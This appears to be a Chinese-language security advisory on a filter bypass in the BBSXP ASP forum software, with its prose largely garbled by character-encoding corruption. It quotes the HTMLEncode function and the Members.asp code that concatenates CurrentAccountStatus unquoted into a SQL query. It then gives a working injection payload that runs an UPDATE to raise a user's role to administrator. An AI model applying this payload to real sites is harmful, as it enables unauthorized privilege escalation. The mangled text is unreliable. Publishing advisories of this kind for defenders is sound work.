BBSxp HTMLEncode˺˲ϵƹ©

©汾:

BBSXP 7.3-BBSXP2008 sql
©:

BBSXPΪһ򵥵ASP+SQLACCESSĶ̳ Ŀǰ°汾ΪBBSXP2008
ٷ¹˺HTMLEncode,ιַ* ,һƹע
Function HTMLEncode(fString)
fString=Replace(fString,CHR(9),"")
fString=Replace(fString,CHR(13),"")
fString=Replace(fString,CHR(22),"")
fString=Replace(fString,CHR(38),"&") '&
fString=Replace(fString,CHR(32)," ") ' 
fString=Replace(fString,CHR(34),""") '"
fString=Replace(fString,CHR(39),"'") ''
fString=Replace(fString,CHR(42),"*") '*
fString=Replace(fString,CHR(44),",") ',
fString=Replace(fString,CHR(45)&CHR(45),"--") 'C
fString=Replace(fString,CHR(60),"<") '<
fString=Replace(fString,CHR(62),">") '>
fString=Replace(fString,CHR(92),"\") '\
fString=Replace(fString,CHR(59),";") ';
fString=Replace(fString,CHR(10),"<br>")
fString=ReplaceText(fString,"([&#])([a-z0-9]*);","$1$2;")
if SiteConfig("BannedText")<>"" then fString=ReplaceText(fString,"("&SiteConfig("BannedText")&")",string(len("&$1&"),"*"))
if IsSqlDataBase=0 then 'Ƭ(ַ)[\u30A0-\u30FF] by yuzi
fString=escape(fString)
fString=ReplaceText(fString,"%u30([A-F][0-F])","0$1;")
fString=unescape(fString)
end if
HTMLEncode=fString
End Function
Members.asp©ļΪ:
SearchType=HTMLEncode(Request("SearchType")) //8
SearchText=HTMLEncode(Request("SearchText"))
SearchRole=RequestInt("SearchRole")
CurrentAccountStatus=HTMLEncode(Request("CurrentAccountStatus"))

if SearchText<>"" then item=item&" and ("&SearchType&" like '%"&SearchText&"%')" //18

if CurrentAccountStatus <> "" then item=item&" and UserAccountStatus="&CurrentAccountStatus&"" //22

if item<>"" then item=" where "&mid(item,5)

TotalCount=Execute("Select count(UserID) From ["&TablePrefix&"Users]"&item)(0) 'ȡ
//54

sql䣺
select * from bbsxp_users where userid=(1)update[bbsxp_users]set[userroleid]=(1)where(username=079006C003600330036003400)
useridƹ˳ɹִupdate
ͬ:
SearchType=1
SearchText=1
CurrentAccountStatus=(1)update[bbsxp_users]set[userroleid]=(1)where(username=079006C003600330036003400)
<* ο
 Bug.Center.Team
 *>